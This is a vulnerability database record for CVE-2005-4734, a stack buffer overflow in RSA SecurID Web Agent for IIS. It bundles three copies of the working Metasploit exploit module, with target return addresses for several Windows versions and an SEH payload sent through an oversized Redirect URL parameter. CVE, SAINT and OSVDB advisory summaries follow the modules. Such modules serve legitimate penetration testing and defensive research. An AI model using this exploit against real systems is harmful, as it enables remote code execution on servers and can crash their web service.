{"id": "MSF:EXPLOIT/WINDOWS/ISAPI/RSA_WEBAGENT_REDIRECT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", "description": "This module exploits a stack buffer overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.\n", "published": "2005-12-26T14:34:22", "modified": "2017-07-24T13:26:21", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734"], "cvelist": ["CVE-2005-4734"], "lastseen": "2020-06-23T22:23:08", "viewCount": 36, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2020-06-23T22:23:08", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-4734"]}, {"type": "osvdb", "idList": ["OSVDB:20151"]}, {"type": "saint", "idList": ["SAINT:AB1003DFB2C2323D03E96320CB2ABA67", "SAINT:E4BAD748E9823F328D88BBC8EF3671A1", "SAINT:C6E42A7A2EC76121A40444C490E607A9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83040"]}, {"type": "exploitdb", "idList": ["EDB-ID:16358"]}], "modified": "2020-06-23T22:23:08", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/isapi/rsa_webagent_redirect.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the SecurID Web\n Agent for IIS. This ISAPI filter runs in-process with\n inetinfo.exe, any attempt to exploit this flaw will result\n in the termination and potential restart of the IIS service.\n\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-4734'],\n ['OSVDB', '20151'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0d\\x20\\x22\\x23\\x25\\x26\\x27\\x2b\\x2f\" +\n (0x3a..0x3f).to_a.pack('C*') + \"\\x40\\x5c\" + \"Zz\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Version-specific return addresses\n ['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],\n ['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],\n\n # Generic return addresses\n ['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],\n ['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],\n\n ['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],\n ['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],\n\n ['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],\n ['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],\n\n ['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],\n ['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 21 2005'))\n\n register_options(\n [\n OptString.new('URL', [ true, \"The path to IISWebAgentIF.dll\", \"/WebID/IISWebAgentIF.dll\" ]),\n ])\n end\n\n def check\n r = send_request_raw({\n 'uri' => normalize_uri(datastore['URL']),\n 'query' => 'GetPic?image=msf'\n }, -1)\n\n if (r and r.body and r.body =~ /RSA Web Access Authentication/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n pat = rand_text_alphanumeric(8192).gsub(/\\d|Z/i, 'A') # HACK\n seh = generate_seh_payload(target['Rets'][1])\n pat[target['Rets'][0]-4, seh.length] = seh\n\n r = send_request_raw({\n 'uri' => normalize_uri(datastore['URL']),\n 'query' => 'Redirect?url=' + pat\n }, 5)\n\n handler\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"cve": [{"lastseen": "2021-02-02T05:24:41", "description": "Stack-based buffer overflow in IISWebAgentIF.dll in RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 for IIS allows remote attackers to execute arbitrary code via a long url parameter in the Redirect method.", "edition": 4, "cvss3": {}, "published": "2005-12-31T05:00:00", "title": "CVE-2005-4734", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4734"], "modified": "2008-09-05T20:57:00", "cpe": ["cpe:/a:rsa:authentication_agent_for_web:5.3", "cpe:/a:rsa:authentication_agent_for_web:5.2"], "id": "CVE-2005-4734", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4734", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rsa:authentication_agent_for_web:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:rsa:authentication_agent_for_web:5.3:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4734"], "description": "Added: 11/30/2005 \nCVE: [CVE-2005-4734](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734>) \nBID: [26424](<http://www.securityfocus.com/bid/26424>) \nOSVDB: [20151](<http://www.osvdb.org/20151>) \n\n\n### Background\n\n[RSA SecurID Web Agent for IIS](<http://www.rsasecurity.com/node.asp?id=2807>) provides access control for IIS web servers using one-time authentication tokens. \n\n### Problem\n\nA buffer overflow in `**IISWebAgentIF.dll**` could allow a remote attacker to execute arbitrary commands using a long, specially crafted url parameter in a Redirect request. \n\n### Resolution\n\nFixes are available from [RSA SecurCare Online](<http://knowledge.rsasecurity.com>). \n\n### References\n\n<http://secunia.com/advisories/17281/> \n\n\n### Limitations\n\nWeb Agent for IIS must be configured correctly in order for this exploit to work. \n\n### Platforms\n\nWindows 2000 \n \n\n", "edition": 1, "modified": "2005-11-30T00:00:00", "published": "2005-11-30T00:00:00", "id": "SAINT:C6E42A7A2EC76121A40444C490E607A9", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/rsa_auth_agent_redirect", "type": "saint", "title": "RSA SecurID Web Agent for IIS redirect buffer overflow", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4734"], "edition": 2, "description": "Added: 11/30/2005 \nCVE: [CVE-2005-4734](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734>) \nBID: [26424](<http://www.securityfocus.com/bid/26424>) \nOSVDB: [20151](<http://www.osvdb.org/20151>) \n\n\n### Background\n\n[RSA SecurID Web Agent for IIS](<http://www.rsasecurity.com/node.asp?id=2807>) provides access control for IIS web servers using one-time authentication tokens. \n\n### Problem\n\nA buffer overflow in `**IISWebAgentIF.dll**` could allow a remote attacker to execute arbitrary commands using a long, specially crafted url parameter in a Redirect request. \n\n### Resolution\n\nFixes are available from [RSA SecurCare Online](<http://knowledge.rsasecurity.com>). \n\n### References\n\n<http://secunia.com/advisories/17281/> \n\n\n### Limitations\n\nWeb Agent for IIS must be configured correctly in order for this exploit to work. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2005-11-30T00:00:00", "published": "2005-11-30T00:00:00", "id": "SAINT:E4BAD748E9823F328D88BBC8EF3671A1", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/rsa_auth_agent_redirect", "type": "saint", "title": "RSA SecurID Web Agent for IIS redirect buffer overflow", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4734"], "description": "Added: 11/30/2005 \nCVE: [CVE-2005-4734](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734>) \nBID: [26424](<http://www.securityfocus.com/bid/26424>) \nOSVDB: [20151](<http://www.osvdb.org/20151>) \n\n\n### Background\n\n[RSA SecurID Web Agent for IIS](<http://www.rsasecurity.com/node.asp?id=2807>) provides access control for IIS web servers using one-time authentication tokens. \n\n### Problem\n\nA buffer overflow in `**IISWebAgentIF.dll**` could allow a remote attacker to execute arbitrary commands using a long, specially crafted url parameter in a Redirect request. \n\n### Resolution\n\nFixes are available from [RSA SecurCare Online](<http://knowledge.rsasecurity.com>). \n\n### References\n\n<http://secunia.com/advisories/17281/> \n\n\n### Limitations\n\nWeb Agent for IIS must be configured correctly in order for this exploit to work. \n\n### Platforms\n\nWindows 2000 \n \n\n", "edition": 4, "modified": "2005-11-30T00:00:00", "published": "2005-11-30T00:00:00", "id": "SAINT:AB1003DFB2C2323D03E96320CB2ABA67", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/rsa_auth_agent_redirect", "title": "RSA SecurID Web Agent for IIS redirect buffer overflow", "type": "saint", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T23:41:26", "description": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow. CVE-2005-4734. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4734"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16358", "href": "https://www.exploit-db.com/exploits/16358/", "sourceData": "##\r\n# $Id: rsa_webagent_redirect.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in the SecurID Web\r\n\t\t\t\tAgent for IIS. This ISAPI filter runs in-process with\r\n\t\t\t\tinetinfo.exe, any attempt to exploit this flaw will result\r\n\t\t\t\tin the termination and potential restart of the IIS service.\r\n\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2005-4734'],\r\n\t\t\t\t\t['OSVDB', '20151'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0d\\x20\\x22\\x23\\x25\\x26\\x27\\x2b\\x2f\" +\r\n\t\t\t\t\t\t(0x3a..0x3f).to_a.pack('C*') + \"\\x40\\x5c\" + \"Zz\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Version-specific return addresses\r\n\t\t\t\t\t['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],\r\n\t\t\t\t\t['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],\r\n\r\n\t\t\t\t\t# Generic return addresses\r\n\t\t\t\t\t['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],\r\n\t\t\t\t\t['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],\r\n\r\n\t\t\t\t\t['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],\r\n\t\t\t\t\t['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],\r\n\r\n\t\t\t\t\t['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],\r\n\t\t\t\t\t['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],\r\n\r\n\t\t\t\t\t['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],\r\n\t\t\t\t\t['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Oct 21 2005'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URL', [ true, \"The path to IISWebAgentIF.dll\", \"/WebID/IISWebAgentIF.dll\" ]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tr = send_request_raw({\r\n\t\t\t'uri' => datastore['URL'],\r\n\t\t\t'query' => 'GetPic?image=msf'\r\n\t\t}, -1)\r\n\r\n\t\tif (r and r.body and r.body =~ /RSA Web Access Authentication/)\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tpat = rand_text_alphanumeric(8192).gsub(/\\d|Z/i, 'A') # HACK\r\n\t\tseh = generate_seh_payload(target['Rets'][1])\r\n\t\tpat[target['Rets'][0]-4, seh.length] = seh\r\n\r\n\t\tr = send_request_raw({\r\n\t\t\t'uri' => datastore['URL'],\r\n\t\t\t'query' => 'Redirect?url=' + pat\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16358/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:46", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4734"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83040", "href": "https://packetstormsecurity.com/files/83040/Microsoft-IIS-ISAPI-RSA-WebAgent-Redirect-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the SecurID Web \nAgent for IIS. This ISAPI filter runs in-process with \ninetinfo.exe, any attempt to exploit this flaw will result \nin the termination and potential restart of the IIS service. \n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2005-4734'], \n['OSVDB', '20151'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0d\\x20\\x22\\x23\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3b\\x3c\" + \n\"\\x3d\\x3e\\x3f\\x40\\x5c\" + \"Zz\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Version-specific return addresses \n['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }], \n['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }], \n \n# Generic return addresses \n['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }], \n['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }], \n \n['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }], \n['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }], \n \n['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }], \n['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }], \n \n['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }], \n['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }], \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URL', [ true, \"The path to IISWebAgentIF.dll\", \"/WebID/IISWebAgentIF.dll\" ]), \n], self.class) \nend \n \ndef check \nr = send_request_raw({ \n'uri' => datastore['URL'], \n'query' => 'GetPic?image=msf' \n}, -1) \n \nif (r and r.body and r.body =~ /RSA Web Access Authentication/) \nreturn Exploit::CheckCode::Detected \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \n \npat = rand_text_alphanumeric(8192).gsub(/\\d|Z/i, 'A') # HACK \nseh = generate_seh_payload(target['Rets'][1]) \npat[target['Rets'][0]-4, seh.length] = seh \n \nr = send_request_raw({ \n'uri' => datastore['URL'], \n'query' => 'Redirect?url=' + pat \n}, 5) \n \nhandler \ndisconnect \nend \n \nend`\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83040/rsa_webagent_redirect.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-4734"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in RSA Authentication Agent for Web for IIS. IISWebAgentIF.dll fails to validate the length of the \"url\" parameter in the \"Redirect\" method, resulting in a stack-based buffer overflow. With a specially crafted GET request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nRSA Authentication Agent for Web for IIS is an ISAPI filter which runs in-process with inetinfo.exe. Any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, RSA Security has reportedly released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in RSA Authentication Agent for Web for IIS. IISWebAgentIF.dll fails to validate the length of the \"url\" parameter in the \"Redirect\" method, resulting in a stack-based buffer overflow. With a specially crafted GET request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://rsasecurity.com/\nVendor Specific Solution URL: https://knowledge.rsasecurity.com/dlcpages/rsa_securid/securid_dlc_aaweb.asp\n[Secunia Advisory ID:17281](https://secuniaresearch.flexerasoftware.com/advisories/17281/)\nGeneric Exploit URL: http://www.metasploit.com/projects/Framework/exploits.html#rsa_iiswebagent_redirect\n[CVE-2005-4734](https://vulners.com/cve/CVE-2005-4734)\n", "modified": "2005-10-21T04:12:28", "published": "2005-10-21T04:12:28", "href": "https://vulners.com/osvdb/OSVDB:20151", "id": "OSVDB:20151", "type": "osvdb", "title": "RSA Authentication Agent for Web IISWebAgentIF.dll Redirect Overflow", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}]}